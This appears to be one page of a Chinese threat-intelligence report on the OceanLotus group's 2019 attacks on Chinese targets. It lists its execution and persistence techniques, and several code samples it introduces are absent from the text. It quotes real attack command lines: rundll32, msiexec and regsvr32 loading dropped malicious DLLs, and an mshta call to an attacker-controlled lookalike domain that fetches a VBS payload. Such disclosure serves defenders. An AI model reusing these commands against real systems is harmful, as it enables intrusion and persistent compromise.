“海莲花”(OceanLotus)2019年针对中国攻击活动汇总
来源:岁月联盟
时间:2020-01-29
2、 使用rundll32加载恶意dll
如某诱饵在执行后,会在C:/Users/Administrator/AppData/Local/Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:"C:/Windows/system32/rundll32.exe" "C:/Users/ADMINI~1/AppData/Local/Microsoft/{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register
3、 宏
使用宏来执行载荷,且宏代码经过的混淆处理:
4、 Office内存执行恶意shellcode
使用宏代码,在office中直接解密shellcode,在内存中创建线程执行:
5、 dll侧加载(白加黑)
使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。
其中所使用的宿主文件对包括:
6、 通过com技术执行
通过com技术,把某恶意dll注册为系统组建来执行:
7、 Chm内嵌脚本
Chm执行后,会提示执行ActiveX代码:
其脚本内容为:
不过由于编码处理的问题,该chm打开后为乱码:
而通过手动解压后,原始内容如下:
8、 使用计划任务进行持久性攻击
如上面的chm诱饵执行后,会在%AppData%/Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务:
命令行为:C:/Windows/System32/msiexec.exe -Y C:/Users/Administrator/AppData/Roaming/bcdsrv.dll
bcdsrv.dll为真正的恶意文件。
9、 lnk调用mstha执行
该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》:
执行lnk后,会调用命令:C:/Windows/SysWOW64/mshta.exe http://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。
10、 使用odbcconf.exe加载文件:
odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截:
11、 WinRAR ACE(CVE-2018-20250)漏洞
带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup)释放一个自解压文件:
该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行:
2.4 多重载荷攻击
上一页 [1] [2] [3] [4] [5] 下一页
